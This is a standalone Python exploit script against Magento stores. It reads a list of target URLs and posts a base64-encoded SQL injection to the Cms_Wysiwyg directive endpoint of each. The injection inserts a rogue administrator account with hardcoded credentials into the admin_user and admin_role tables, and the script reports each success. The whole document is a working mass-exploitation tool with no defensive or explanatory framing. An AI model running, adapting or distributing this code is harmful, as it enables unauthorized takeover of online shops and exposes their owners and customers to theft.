Magento Python

import requests
import base64
import sys
target = open(sys.argv[1],'r')

for z in target.readlines():
    z=z.strip()
    if not z.startswith("http"):
            z = "http://" + z

    if z.endswith("/"):
            z = z[:-1]
    target_url = z + "/index.php/admin/Cms_Wysiwyg/directive/index/"

    # For demo purposes, I use the same attack as is being used in the wild
    SQLQUERY="""
    SET @SALT = 'rp';
    SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
    SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
    INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','[email protected]','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
    INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
    """

    # Put the nice readable queries into one line,
    # and insert the username:password combinination
    query = SQLQUERY.replace("\n", "").format(username="evoo", password="lastc0de")
    pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)

    # e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ decoded is{{block type=Adminhtml/report_search_grid output=getCsvFile}}
    r = requests.post(target_url,
              data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
                    "filter": base64.b64encode(pfilter),
                    "forwarded": 1})
    if r.ok:
        print "[+]Success {0}/admin with creds evoo|lastc0de".format(z)
    else:
        print "[+]Failed"
    target.close()